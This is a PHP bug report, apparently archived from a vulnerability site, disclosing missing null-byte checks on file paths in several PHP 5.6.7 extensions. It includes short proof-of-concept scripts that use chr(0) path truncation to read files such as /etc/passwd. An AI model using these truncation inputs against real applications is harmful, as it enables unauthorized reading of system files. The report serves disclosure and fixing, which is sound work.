PHP 5.6.7Missing null byte checks for paths in various extensions
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP 5.6.7 Missing null byte checks for paths in various extensions</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Description: ------------ Having been inspired by CVE-2014-5120, I did a little digging and found a few more examples of PHP extensions which aren't checking for null bytes when handling file paths. The exploitability varies a bit depending on what the extension is doing (and of course depends on application code allowing user input to control a partial path that's supposed to have a particular suffix). Examples I've found are included below (likely non-exhaustive: some of the DB extensions appear to lack checks as well, but I didn't build PoCs for them) Test script: --------------- <?php $doc = new DOMDocument(); $doc->load('/etc/fonts/fonts.conf' . chr(0) . 'somethingelse.xml'); echo $doc->saveXML(); <?php xmlwriter_open_uri('/tmp/thisisatest'. chr(0) . 'foobar.xml'); <?php $f=finfo_open(FILEINFO_NONE); echo finfo_file($f, '/etc/passwd' . chr(0) . 'foobar.txt'); <?php var_dump( hash_hmac_file('md5', '/etc/passwd', 'secret') === hash_hmac_file('md5', '/etc/passwd' . chr(0) . 'foobar', 'secret') ); Expected result: ---------------- Lots of warnings/errors about null bytes Actual result: -------------- Null byte causes truncation in path names, leading the functions to return results. </BODY></HTML>
